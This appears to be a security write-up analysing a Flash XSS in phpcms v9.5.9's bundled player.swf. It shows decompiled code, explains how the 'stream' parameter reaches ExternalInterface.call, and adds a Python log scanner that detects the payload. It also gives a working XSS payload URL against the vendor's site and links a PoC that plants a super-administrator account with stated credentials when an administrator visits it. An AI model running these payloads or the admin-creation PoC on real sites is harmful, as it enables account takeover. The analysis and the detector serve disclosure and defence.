Author: phithon

Team: 安全盒子 (SecBox) team, www.secbox.cn

Blog: https://www.leavesongs.com

 

/statics/js/ckeditor/plugins/flashplayer/player/player.swf is a Flash file that phpcms added in its new version, v9.5.9.

Decompiling it gives:

package {
    import flash.display.Loader;
    import flash.display.MovieClip;
    import flash.display.StageAlign;
    import flash.display.StageScaleMode;
    import flash.events.ContextMenuEvent;
    import flash.events.Event;
    import flash.external.ExternalInterface;
    import flash.net.URLRequest;
    import flash.net.navigateToURL;

    // The imports above and the closing braces at the end were missing from the
    // decompiler output and are restored here; the body is unchanged.
    public class myPlayer extends MovieClip {

        public function myPlayer(){
            var stream:* = undefined;
            var streamname:* = undefined;
            var live:* = undefined;
            var subscribe:* = undefined;
            var video:* = undefined;
            var thumbnail:* = undefined;
            var autoplay:* = undefined;
            var fullscreen:* = undefined;
            var skin:* = undefined;
            var openLink:* = undefined;
            super();
            // context-menu handler that opens the f4player project page
            openLink = function (_arg1:ContextMenuEvent):void{
                navigateToURL(new URLRequest("http://gokercebeci.com/dev/f4player/?feature=player"));
            };
            stage.scaleMode = StageScaleMode.NO_SCALE;
            stage.align = StageAlign.TOP_LEFT;
            // every value below is read straight from the swf's URL parameters (FlashVars)
            stream = this.loaderInfo.parameters.stream;
            streamname = this.loaderInfo.parameters.streamname;
            live = (this.loaderInfo.parameters.live == 1);
            subscribe = (this.loaderInfo.parameters.subscribe == 1);
            video = this.loaderInfo.parameters.video;
            thumbnail = this.loaderInfo.parameters.thumbnail;
            var skinfile:* = this.loaderInfo.parameters.skin;
            autoplay = (this.loaderInfo.parameters.autoplay == 1);
            fullscreen = this.loaderInfo.parameters.fullscreen;
            // runs once the skin swf has finished loading
            var skinEvent:* = function (_arg1:Event):void{
                skin = _arg1.currentTarget.content;
                stage.addChild(skin);
                ExternalInterface.call("console.log", "initializating ...");
                // the caller-controlled `stream` value is handed to JavaScript here
                ExternalInterface.call("stream", stream);
                var _local2:* = new Player(stream, streamname, live, subscribe);
                skin.initialization(_local2, stage.stageWidth, stage.stageHeight, video, ((thumbnail) ? thumbnail : null), autoplay, fullscreen);
            };
            var sl:* = new Loader();
            sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);
            // loads the skin named in the `skin` parameter, or the bundled default
            sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));
        }
    }
}

These lines are the important ones:

stream = this.loaderInfo.parameters.stream;

var skinfile:* = this.loaderInfo.parameters.skin;

var skinEvent:* = function (_arg1:Event):void{..ExternalInterface.call("stream", stream);..}

sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);

sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));

The first two lines read stream and skinfile from this.loaderInfo.parameters. The third defines a function, skinEvent, which calls ExternalInterface.call with stream as its second argument. The fourth registers skinEvent as the callback for the Event.COMPLETE event. The fifth performs the load.

So the whole flow is as follows:

The swf loads, reads the skinfile parameter, loads the file skinfile points to, and once that load completes it calls the callback skinEvent. skinEvent in turn calls ExternalInterface.call to execute JavaScript, and the second argument of that call is under the caller's control.

Since the second argument is controllable, this yields a Flash XSS.

Demo on the official site:

http://www.phpcms.cn/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//

[Screenshot: core column, phpcms 一个 Flash 的审计与分析 (安全盒子)]

Flash XSS is more convenient than other kinds of XSS because the browser's XSS auditor does not see it.
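As an added, defender-side example (not code from the original post or from phpcms), the following Python scans Apache combined-format access-log lines for requests to player.swf whose stream value contains characters that could break out of the JavaScript that ExternalInterface.call builds around its argument, or whose skin value is not the relative .swf path the player expects; the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache combined format (not from the
# original post): a benign player.swf request, one carrying the stream payload
# shown above, and one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2016:10:00:00 +0800] "GET /statics/js/ckeditor/plugins/flashplayer/player/player.swf?stream=rtmp/demo&skin=skins/mySkin.swf HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2016:10:00:07 +0800] "GET /statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\\%22))}catch(e){alert(1)}// HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2016:10:00:09 +0800] "GET /index.php?m=content&c=index HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A legitimate stream name never needs quotes, backslashes, brackets or braces;
# any of them in `stream` is a sign someone is trying to break out of the
# JavaScript that ExternalInterface.call builds around its argument.
UNSAFE_STREAM = re.compile(r'["\'\\(){};<>]')
# The player defaults to the relative path skins/mySkin.swf, so an absolute
# URL or an upward-traversing path in `skin` is unexpected.
EXPECTED_SKIN = re.compile(r'^(?!/)(?!.*\.\.)[\w./-]+\.swf$')

def check_player_request(url):
    """Return (param, value) findings for one request URL; [] if it looks benign."""
    parts = urlsplit(url)
    if not parts.path.endswith("/player.swf"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for value in params.get("skin", []):
        if "://" in value or not EXPECTED_SKIN.match(value):
            findings.append(("skin", value))
    for value in params.get("stream", []):
        if UNSAFE_STREAM.search(value):
            findings.append(("stream", value))
    return findings

def scan_access_log(text):
    """Return (client_ip, url, findings) for every flagged request in the log."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        findings = check_player_request(m.group(1)) if m else []
        if findings:
            hits.append((line.split(" ", 1)[0], m.group(1), findings))
    return hits

if __name__ == "__main__":
    for ip, url, findings in scan_access_log(SAMPLE_LOG):
        print(ip, url, findings)
```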

A PoC that adds a backend administrator:

http://mhz.pw/game/phpcms/frame.php?target=http://10.211.55.3/phpcms

Change target to your own target; once the target site's administrator visits the PoC, a super administrator with username phithon and password 33444433 is added:

[Screenshot: core column, phpcms 一个 Flash 的审计与分析 (安全盒子)]